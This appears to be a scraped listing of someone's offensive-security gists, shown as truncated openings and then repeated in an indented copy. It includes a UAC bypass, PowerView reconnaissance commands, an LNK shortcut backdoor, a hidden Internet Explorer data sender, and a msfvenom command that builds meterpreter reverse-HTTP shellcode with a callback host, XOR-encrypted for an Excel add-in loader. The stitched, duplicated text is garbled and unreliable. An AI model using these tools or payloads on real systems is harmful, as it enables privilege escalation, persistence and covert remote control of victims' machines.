moo_hax moohax

## UACBypass.ps1
function Invoke-UACBypass {
<#
.SYNOPSIS

Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy.

Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

## PowerView-2.0-tricks.ps1
# NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/)
#   has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993

# get all the groups a user is effectively a member of, 'recursing up'
Get-NetGroup -UserName <USER>

# get all the effective members of a group, 'recursing down'
Get-NetGroupMember -GoupName <GROUP> -Recurse

# get the effective set of users who can administer a server

## PowerView-3.0-tricks.ps1
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
#   tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
#   https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

# New function naming schema:
#   Verbs:
#       Get : retrieve full raw data sets
#       Find : ‘find’ specific data entries in a data set

## LNKBackdoor.ps1
function Set-LNKBackdoor {
<#
    .SYNOPSIS

        Backdoors an existing .LNK shortcut to trigger the original binary and a payload specified by
        -ScriptBlock or -Command.

        Author: @harmj0y
        License: BSD 3-Clause
        Required Dependencies: None

## nessus_2_db.py
#!/usr/bin/env python
# Copyright (c) 2017, Brandan Geise [coldfusion]
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#

## BinaryMessageFormatter.cs
//
// Enable MSMQ in "Turn Windows Features on or off"
// Open "Computer Management -> Services and Applications -> Message Queueing -> (Right click) Private Queue -> New"
// There are differences between domain joined vs non queues
//
// System.Messaging.BinaryMessageFormatter
// public BinaryMessageFormatter()
// {
//    this.formatter = new BinaryFormatter();
// }

## NukePSLogging.cpp
void Payload() {
	DWORD threadId;
	CreateThread(
		NULL,                   // default security attributes
		0,                      // use default stack size
		MyThreadFunction,       // thread function name
		NULL,          // argument to thread function
		0,                      // use default creation flags
		&threadId);
}

## ie_com.cs
// sample function that takes in a destination server, POST data, and custom HTTP request headers
private string SendData(string dst, byte[] postData, string customHeaders)
{
    Type com_type = Type.GetTypeFromCLSID(new Guid("0002DF01-0000-0000-C000-000000000046"));
    object IE = Activator.CreateInstance(com_type);

    object[] falseArr = new object[] { false };
    object[] trueArr = new object[] { true };
    com_type.InvokeMember("Visible", System.Reflection.BindingFlags.SetProperty, null, IE, falseArr);
    com_type.InvokeMember("Silent", System.Reflection.BindingFlags.SetProperty, null, IE, trueArr);

## shellcode_multibyteXOR_ExcelRegisterXLL.c
// Compile with:
//		cl.exe x86_meterpreter_reverse_http_xor.c /LD /o x86_meterpreter_reverse_http_xor.xll
//
// C/CPP code obtained like this:
// 1. Get a raw meterpreter shellcode:
//		msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=any.website.com LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai > met_rev_winhttp_x86.raw
// 2. Encrypt it with a custom multibyte XOR string (https://github.com/Arno0x/ShellcodeWrapper):
//		./shellcode_encoder.py -cpp met_rev_winhttp_x86.raw testkey xor

#include <Windows.h>

## enclave.cpp
// enclave.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include "Windows.h"
#include "Winbase.h"
#include "enclaveapi.h"
#include <iostream>

#pragma comment(lib, "Kernel32.lib")
	function Invoke-UACBypass {
	<#
	.SYNOPSIS

	Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy.

	Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3)
	License: BSD 3-Clause
	Required Dependencies: None
	Optional Dependencies: None
	# NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/)
	# has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993

	# get all the groups a user is effectively a member of, 'recursing up'
	Get-NetGroup -UserName <USER>

	# get all the effective members of a group, 'recursing down'
	Get-NetGroupMember -GoupName <GROUP> -Recurse

	# get the effective set of users who can administer a server
	# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
	# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

	# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
	# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

	# New function naming schema:
	# Verbs:
	# Get : retrieve full raw data sets
	# Find : ‘find’ specific data entries in a data set
	function Set-LNKBackdoor {
	<#
	.SYNOPSIS

	Backdoors an existing .LNK shortcut to trigger the original binary and a payload specified by
	-ScriptBlock or -Command.

	Author: @harmj0y
	License: BSD 3-Clause
	Required Dependencies: None
	#!/usr/bin/env python
	# Copyright (c) 2017, Brandan Geise [coldfusion]
	#
	# Permission is hereby granted, free of charge, to any person obtaining a copy
	# of this software and associated documentation files (the "Software"), to deal
	# in the Software without restriction, including without limitation the rights
	# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
	# copies of the Software, and to permit persons to whom the Software is
	# furnished to do so, subject to the following conditions:
	#
	//
	// Enable MSMQ in "Turn Windows Features on or off"
	// Open "Computer Management -> Services and Applications -> Message Queueing -> (Right click) Private Queue -> New"
	// There are differences between domain joined vs non queues
	//
	// System.Messaging.BinaryMessageFormatter
	// public BinaryMessageFormatter()
	// {
	// this.formatter = new BinaryFormatter();
	// }
	void Payload() {
	DWORD threadId;
	CreateThread(
	NULL, // default security attributes
	0, // use default stack size
	MyThreadFunction, // thread function name
	NULL, // argument to thread function
	0, // use default creation flags
	&threadId);
	}
	// sample function that takes in a destination server, POST data, and custom HTTP request headers
	private string SendData(string dst, byte[] postData, string customHeaders)
	{
	Type com_type = Type.GetTypeFromCLSID(new Guid("0002DF01-0000-0000-C000-000000000046"));
	object IE = Activator.CreateInstance(com_type);

	object[] falseArr = new object[] { false };
	object[] trueArr = new object[] { true };
	com_type.InvokeMember("Visible", System.Reflection.BindingFlags.SetProperty, null, IE, falseArr);
	com_type.InvokeMember("Silent", System.Reflection.BindingFlags.SetProperty, null, IE, trueArr);
	// Compile with:
	// cl.exe x86_meterpreter_reverse_http_xor.c /LD /o x86_meterpreter_reverse_http_xor.xll
	//
	// C/CPP code obtained like this:
	// 1. Get a raw meterpreter shellcode:
	// msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=any.website.com LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai > met_rev_winhttp_x86.raw
	// 2. Encrypt it with a custom multibyte XOR string (https://github.com/Arno0x/ShellcodeWrapper):
	// ./shellcode_encoder.py -cpp met_rev_winhttp_x86.raw testkey xor

	#include <Windows.h>
	// enclave.cpp : Defines the entry point for the console application.
	//

	#include "stdafx.h"
	#include "Windows.h"
	#include "Winbase.h"
	#include "enclaveapi.h"
	#include <iostream>

	#pragma comment(lib, "Kernel32.lib")